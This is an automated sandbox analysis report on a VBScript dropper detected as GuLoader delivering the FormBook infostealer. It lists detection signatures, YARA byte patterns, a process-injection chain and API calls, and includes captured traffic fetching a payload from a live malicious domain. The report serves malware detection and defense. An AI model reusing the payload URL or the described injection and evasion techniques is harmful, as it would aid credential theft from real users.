Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zeskanowana lista przedmiot#U00f3w nr 84329.vbs

Overview

General Information

Sample name:Zeskanowana lista przedmiot#U00f3w nr 84329.vbs
Analysis ID:1518414
MD5:66ccc86e92b90555bef9ec7f4281cc8b
SHA1:8ef7f0bec3beb48df154b350cae7729df9e3cb74
SHA256:6e435f3a080733d5733beb10fd0d45f8530f9f5ebf8367ff1b4daf56d0106dc3
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found stalling execution ending in API Sleep call
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 7036 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • temp_executable.exe (PID: 2296 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: C9B895E1253AA2B7147BE9B1E43F2DBD)
      • temp_executable.exe (PID: 4004 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: C9B895E1253AA2B7147BE9B1E43F2DBD)
        • RAVCpl64.exe (PID: 7620 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
          • cmdkey.exe (PID: 5772 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
            • explorer.exe (PID: 4940 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 3 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", CommandLine|base64offset|contains: +-, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4940, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", ProcessId: 7036, ProcessName: wscript.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", CommandLine|base64offset|contains: +-, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4940, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", ProcessId: 7036, ProcessName: wscript.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-25T17:20:28.125456+020028032702Potentially Bad Traffic192.168.11.2049755170.249.236.53443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: unknownHTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49755 version: TLS 1.2
        Source: Binary string: wntdll.pdb source: temp_executable.exe, cmdkey.exe
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004066F4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004065AA FindFirstFileW,FindClose,2_2_004065AA
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_00402B75 FindFirstFileW,2_2_00402B75
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_00402B75 FindFirstFileW,3_2_00402B75
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_004066F4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_004065AA FindFirstFileW,FindClose,3_2_004065AA
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 4x nop then mov ebx, 00000004h3_2_32A304E8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then mov ebx, 00000004h5_2_037104E8
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49755 -> 170.249.236.53:443
        Source: global trafficHTTP traffic detected: GET /TkFvuYGGiJLZuopqvpi7.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: secretspark.com.bdCache-Control: no-cache
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /TkFvuYGGiJLZuopqvpi7.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: secretspark.com.bdCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: secretspark.com.bd
        Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mU
        Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownHTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49755 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_00404B0B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00404B0B

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D834E0 NtCreateMutant,LdrInitializeThunk,3_2_32D834E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_32D82BC0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_32D82B90
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82EB0 NtProtectVirtualMemory,LdrInitializeThunk,3_2_32D82EB0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_32D82D10
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D84260 NtSetContextThread,3_2_32D84260
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D84570 NtSuspendThread,3_2_32D84570
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82AC0 NtEnumerateValueKey,3_2_32D82AC0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82A80 NtClose,3_2_32D82A80
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82AA0 NtQueryInformationFile,3_2_32D82AA0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82A10 NtWriteFile,3_2_32D82A10
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82BE0 NtQueryVirtualMemory,3_2_32D82BE0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82B80 NtCreateKey,3_2_32D82B80
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82B10 NtAllocateVirtualMemory,3_2_32D82B10
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82B00 NtQueryValueKey,3_2_32D82B00
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82B20 NtQueryInformationProcess,3_2_32D82B20
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D838D0 NtGetContextThread,3_2_32D838D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D829D0 NtWaitForSingleObject,3_2_32D829D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D829F0 NtReadFile,3_2_32D829F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82ED0 NtResumeThread,3_2_32D82ED0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82EC0 NtQuerySection,3_2_32D82EC0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82E80 NtCreateProcessEx,3_2_32D82E80
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82E50 NtCreateSection,3_2_32D82E50
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82E00 NtQueueApcThread,3_2_32D82E00
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82FB0 NtSetValueKey,3_2_32D82FB0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82F00 NtCreateFile,3_2_32D82F00
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82F30 NtOpenDirectoryObject,3_2_32D82F30
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82CD0 NtEnumerateKey,3_2_32D82CD0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82CF0 NtDelayExecution,3_2_32D82CF0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D83C90 NtOpenThread,3_2_32D83C90
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82C50 NtUnmapViewOfSection,3_2_32D82C50
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82C10 NtOpenProcess,3_2_32D82C10
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D83C30 NtOpenProcessToken,3_2_32D83C30
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82C30 NtMapViewOfSection,3_2_32D82C30
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82C20 NtSetInformationFile,3_2_32D82C20
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82DC0 NtAdjustPrivilegesToken,3_2_32D82DC0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82DA0 NtReadVirtualMemory,3_2_32D82DA0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82D50 NtWriteVirtualMemory,3_2_32D82D50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038834E0 NtCreateMutant,LdrInitializeThunk,5_2_038834E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882B80 NtCreateKey,LdrInitializeThunk,5_2_03882B80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03882B90
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_03882BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882B00 NtQueryValueKey,LdrInitializeThunk,5_2_03882B00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03882B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882A80 NtClose,LdrInitializeThunk,5_2_03882A80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882E50 NtCreateSection,LdrInitializeThunk,5_2_03882E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_03882D10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882CF0 NtDelayExecution,LdrInitializeThunk,5_2_03882CF0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882C30 NtMapViewOfSection,LdrInitializeThunk,5_2_03882C30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03884260 NtSetContextThread,5_2_03884260
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03884570 NtSuspendThread,5_2_03884570
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882BE0 NtQueryVirtualMemory,5_2_03882BE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882B20 NtQueryInformationProcess,5_2_03882B20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882AA0 NtQueryInformationFile,5_2_03882AA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882AC0 NtEnumerateValueKey,5_2_03882AC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882A10 NtWriteFile,5_2_03882A10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038829D0 NtWaitForSingleObject,5_2_038829D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038829F0 NtReadFile,5_2_038829F0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038838D0 NtGetContextThread,5_2_038838D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882FB0 NtSetValueKey,5_2_03882FB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882F00 NtCreateFile,5_2_03882F00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882F30 NtOpenDirectoryObject,5_2_03882F30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882E80 NtCreateProcessEx,5_2_03882E80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882EB0 NtProtectVirtualMemory,5_2_03882EB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882EC0 NtQuerySection,5_2_03882EC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882ED0 NtResumeThread,5_2_03882ED0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882E00 NtQueueApcThread,5_2_03882E00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882DA0 NtReadVirtualMemory,5_2_03882DA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882DC0 NtAdjustPrivilegesToken,5_2_03882DC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882D50 NtWriteVirtualMemory,5_2_03882D50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03883C90 NtOpenThread,5_2_03883C90
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882CD0 NtEnumerateKey,5_2_03882CD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882C10 NtOpenProcess,5_2_03882C10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882C20 NtSetInformationFile,5_2_03882C20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03883C30 NtOpenProcessToken,5_2_03883C30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03882C50 NtUnmapViewOfSection,5_2_03882C50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371F0AD NtQueryInformationProcess,5_2_0371F0AD
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_037239A8 NtSuspendThread,5_2_037239A8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03723FC8 NtQueueApcThread,5_2_03723FC8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03723698 NtSetContextThread,5_2_03723698
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03723CB8 NtResumeThread,5_2_03723CB8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,2_2_004036D7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,3_2_004036D7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004043F92_2_004043F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_004070FB2_2_004070FB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_6FC323512_2_6FC32351
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_004043F93_2_004043F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_004070FB3_2_004070FB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3D2EC3_2_32D3D2EC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D413803_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5E3103_2_32D5E310
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0F3303_2_32E0F330
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5B0D03_2_32D5B0D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E070F13_2_32E070F1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D400A03_2_32D400A0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFE0763_2_32DFE076
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C03_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E03_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D9717A3_2_32D9717A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F1133_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DED1303_2_32DED130
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E1010E3_2_32E1010E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0F6F63_2_32E0F6F6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0A6C03_2_32E0A6C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC36EC3_2_32DC36EC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4C6E03_2_32D4C6E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D506803_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFD6463_2_32DFD646
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D746703_2_32D74670
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6C6003_2_32D6C600
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DED62C3_2_32DED62C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D527603_2_32D52760
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5A7603_2_32D5A760
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E067573_2_32E06757
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D504453_2_32D50445
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E075C63_2_32E075C6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0F5C93_2_32E0F5C9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E1A5263_2_32E1A526
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0FA893_2_32E0FA89
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6FAA03_2_32D6FAA0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0EA5B3_2_32E0EA5B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0CA133_2_32E0CA13
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC4BC03_2_32DC4BC0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50B103_2_32D50B10
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0FB2E3_2_32E0FB2E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E078F33_2_32E078F3
